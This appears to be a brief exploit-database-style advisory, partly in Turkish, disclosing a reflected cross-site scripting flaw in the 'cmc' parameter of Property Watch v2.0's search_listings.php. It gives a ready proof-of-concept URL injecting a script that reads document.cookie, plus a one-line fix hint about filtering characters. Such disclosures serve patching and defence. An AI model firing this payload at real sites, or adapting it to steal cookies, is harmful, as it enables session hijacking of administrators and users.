< ------------------- header data start ------------------- >

#############################################################

# Application Name : Property Watch v2.0

# Vulnerable Type : Cross Site Scripting ( XSS )

# Infection : Yönetici ve User cookie’leri çalinabilir.

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

# author : Bug Researchers/HayBer

# Example : alert(document.cookie)http://demo.propertywatchscript.com/search_listings.php?advsearchsubmit=advsearchsubmit&cmc=\\><script>alert(document.cookie)</script>

Or ; alert(document.cookie)>Click


#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

search_listings.php?advsearchsubmit=advsearchsubmit&cmc=\\><script>alert(document.cookie)</script>

< -- bug code end of -- >